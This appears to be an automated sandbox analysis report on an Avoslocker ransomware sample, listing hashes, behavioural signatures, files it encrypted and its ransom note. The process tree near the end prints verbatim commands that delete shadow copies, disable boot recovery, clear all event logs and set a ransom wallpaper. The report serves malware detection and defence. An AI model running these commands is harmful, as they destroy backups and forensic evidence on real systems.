Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
25-12-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
test.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
test.exe
Resource
win10v2004-20241007-en
General
-
Target
test.exe
-
Size
1.1MB
-
MD5
04dbd49522ee24448a45aebf69e88850
-
SHA1
67b8315214cb31fa4b5e013f24884b663768f2cf
-
SHA256
f5880e3ce512f648351291a3728b13adb6c87954f9a88c3070dce9f4c5c5b1f4
-
SHA512
9e30f7160dfe6fed3c4700ba13fffc7f69ae0cba530585bf3ece644b56572cc929652693d51da9a8067435fbc5b675dff12cedf0ad976c5d60d909bbe1e249a7
-
SSDEEP
24576:u4s+oT+NXBLi0rjFXvyHBlbmCZa8pXawp90sQvX:uioT+NXVFjxvMBlbmya8pKU9nQvX
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 952 bcdedit.exe 1672 bcdedit.exe -
Renames multiple (10402) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI test.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: test.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1099485973.png" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui test.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan test.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BUSINESS.ONE test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR51B.GIF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19986_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240291.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00132_.WMF test.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png test.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00238_.WMF test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\it-IT\micaut.dll.mui test.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\gadget.xml test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00526_.WMF test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe test.exe File created C:\Program Files\Common Files\Microsoft Shared\TextConv\it-IT\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT test.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\weather.html test.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\HEADER.GIF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21366_.GIF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00008_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF test.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21337_.GIF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\micaut.dll.mui test.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\settings.css test.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\VCTRN_01.MID test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml test.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png test.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\css\currency.css test.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299171.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF test.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png test.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui test.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADVZIP.DIC test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg test.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml test.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\flyout.html test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46B.GIF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18256_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01145_.WMF test.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png test.exe File created C:\Program Files (x86)\Windows Defender\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN110.XML test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV test.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\STOCKS.DAT test.exe -
pid Process 1548 powershell.exe 6032 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1784 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2676 test.exe 1548 powershell.exe 6032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 2676 test.exe Token: SeIncreaseQuotaPrivilege 696 WMIC.exe Token: SeSecurityPrivilege 696 WMIC.exe Token: SeTakeOwnershipPrivilege 696 WMIC.exe Token: SeLoadDriverPrivilege 696 WMIC.exe Token: SeSystemProfilePrivilege 696 WMIC.exe Token: SeSystemtimePrivilege 696 WMIC.exe Token: SeProfSingleProcessPrivilege 696 WMIC.exe Token: SeIncBasePriorityPrivilege 696 WMIC.exe Token: SeCreatePagefilePrivilege 696 WMIC.exe Token: SeBackupPrivilege 696 WMIC.exe Token: SeRestorePrivilege 696 WMIC.exe Token: SeShutdownPrivilege 696 WMIC.exe Token: SeDebugPrivilege 696 WMIC.exe Token: SeSystemEnvironmentPrivilege 696 WMIC.exe Token: SeRemoteShutdownPrivilege 696 WMIC.exe Token: SeUndockPrivilege 696 WMIC.exe Token: SeManageVolumePrivilege 696 WMIC.exe Token: 33 696 WMIC.exe Token: 34 696 WMIC.exe Token: 35 696 WMIC.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeSecurityPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeSecurityPrivilege 1548 powershell.exe Token: SeBackupPrivilege 3756 vssvc.exe Token: SeRestorePrivilege 3756 vssvc.exe Token: SeAuditPrivilege 3756 vssvc.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeIncreaseQuotaPrivilege 696 WMIC.exe Token: SeSecurityPrivilege 696 WMIC.exe Token: SeTakeOwnershipPrivilege 696 WMIC.exe Token: SeLoadDriverPrivilege 696 WMIC.exe Token: SeSystemProfilePrivilege 696 WMIC.exe Token: SeSystemtimePrivilege 696 WMIC.exe Token: SeProfSingleProcessPrivilege 696 WMIC.exe Token: SeIncBasePriorityPrivilege 696 WMIC.exe Token: SeCreatePagefilePrivilege 696 WMIC.exe Token: SeBackupPrivilege 696 WMIC.exe Token: SeRestorePrivilege 696 WMIC.exe Token: SeShutdownPrivilege 696 WMIC.exe Token: SeDebugPrivilege 696 WMIC.exe Token: SeSystemEnvironmentPrivilege 696 WMIC.exe Token: SeRemoteShutdownPrivilege 696 WMIC.exe Token: SeUndockPrivilege 696 WMIC.exe Token: SeManageVolumePrivilege 696 WMIC.exe Token: 33 696 WMIC.exe Token: 34 696 WMIC.exe Token: 35 696 WMIC.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeSecurityPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeSecurityPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeSecurityPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeSecurityPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1548 powershell.exe Token: SeSecurityPrivilege 1548 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 2676 wrote to memory of 1736 2676 test.exe 31 PID 2676 wrote to memory of 1736 2676 test.exe 31 PID 2676 wrote to memory of 1736 2676 test.exe 31 PID 2676 wrote to memory of 1736 2676 test.exe 31 PID 2676 wrote to memory of 2484 2676 test.exe 32 PID 2676 wrote to memory of 2484 2676 test.exe 32 PID 2676 wrote to memory of 2484 2676 test.exe 32 PID 2676 wrote to memory of 2484 2676 test.exe 32 PID 2676 wrote to memory of 2424 2676 test.exe 33 PID 2676 wrote to memory of 2424 2676 test.exe 33 PID 2676 wrote to memory of 2424 2676 test.exe 33 PID 2676 wrote to memory of 2424 2676 test.exe 33 PID 2676 wrote to memory of 2468 2676 test.exe 34 PID 2676 wrote to memory of 2468 2676 test.exe 34 PID 2676 wrote to memory of 2468 2676 test.exe 34 PID 2676 wrote to memory of 2468 2676 test.exe 34 PID 2676 wrote to memory of 2368 2676 test.exe 35 PID 2676 wrote to memory of 2368 2676 test.exe 35 PID 2676 wrote to memory of 2368 2676 test.exe 35 PID 2676 wrote to memory of 2368 2676 test.exe 35 PID 2368 wrote to memory of 1548 2368 cmd.exe 36 PID 2368 wrote to memory of 1548 2368 cmd.exe 36 PID 2368 wrote to memory of 1548 2368 cmd.exe 36 PID 1736 wrote to memory of 696 1736 cmd.exe 37 PID 1736 wrote to memory of 696 1736 cmd.exe 37 PID 1736 wrote to memory of 696 1736 cmd.exe 37 PID 2424 wrote to memory of 952 2424 cmd.exe 38 PID 2424 wrote to memory of 952 2424 cmd.exe 38 PID 2424 wrote to memory of 952 2424 cmd.exe 38 PID 2468 wrote to memory of 1672 2468 cmd.exe 39 PID 2468 wrote to memory of 1672 2468 cmd.exe 39 PID 2468 wrote to memory of 1672 2468 cmd.exe 39 PID 2484 wrote to memory of 1784 2484 cmd.exe 40 PID 2484 wrote to memory of 1784 2484 cmd.exe 40 PID 2484 wrote to memory of 1784 2484 cmd.exe 40 PID 2676 wrote to memory of 6032 2676 test.exe 46 PID 2676 wrote to memory of 6032 2676 test.exe 46 PID 2676 wrote to memory of 6032 2676 test.exe 46 PID 2676 wrote to memory of 6032 2676 test.exe 46 PID 6032 wrote to memory of 5512 6032 powershell.exe 47 PID 6032 wrote to memory of 5512 6032 powershell.exe 47 PID 6032 wrote to memory of 5512 6032 powershell.exe 47 PID 6032 wrote to memory of 2424 6032 powershell.exe 48 PID 6032 wrote to memory of 2424 6032 powershell.exe 48 PID 6032 wrote to memory of 2424 6032 powershell.exe 48 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1784
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:952
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1672
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6032 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1099485973.png /f3⤵
- Sets desktop wallpaper using registry
PID:5512
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False3⤵PID:2424
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1011B
MD5c92c2b70fb37f84aab38412ad9226aa8
SHA114f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA51204f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848
-
Filesize
32KB
MD51102d805d581b2642cec9945747c8968
SHA1272aa475615770fe25968fc1787353ca08c89953
SHA25659fde654769fa30863cfb5ae13b21c5adb797f59d810471ea47cf46c2f0dacc0
SHA512aa3b456f24f541a9408653984d8916ba7e6eb7c18f3e0a054f01836c4ec0bfd3c186e7369a077adef7ee73b5452b3ad87b8a3b338aebe5482171e5fdbf1b54c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5955e9adc3ade453bbcb8ea667cb5abbc
SHA1b69c2c01968182b3639ed60a5948e9119bc89e38
SHA25666da87fac81f891ac983d5c882541b54c1203c4b718a088aff34796c4e229dde
SHA51254ba3199bbd2b92336b071a08207736bd843a567eb6ed77b9d684606a66608e0f431b8c89ea97c888bb0c40729d3a0596413ff8362fffcd67b8636de8d7c145b